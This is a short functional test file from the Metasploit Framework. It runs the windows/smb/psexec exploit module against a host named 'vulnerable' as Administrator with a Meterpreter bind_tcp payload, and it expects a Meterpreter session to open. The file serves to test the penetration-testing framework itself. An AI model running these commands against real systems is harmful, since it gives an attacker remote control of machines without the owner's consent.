metasploit-framework/test/functional/framework/msftest/psexec.msftest

30 lines
581 B
Plaintext
Raw Normal View History

<xml>
<msf_test>
<name>
psexec
</name>
<description>
This test runs psexec on a vulnerable host.
</description>
<commands>
use windows/smb/psexec
set WORKSPACE default
set RHOST vulnerable
set SMBUser Administrator
set SMBPass
set payload windows/meterpreter/bind_tcp
exploit -z
exit
</commands>
<output>
<successes>
<success>Meterpreter session 1 opened</success>
<success>Meterpreter session 1 closed. Reason: User exit</success>
</successes>
<failures>
</failures>
<failure_exceptions>
</failure_exceptions>
</output>
<msf_test>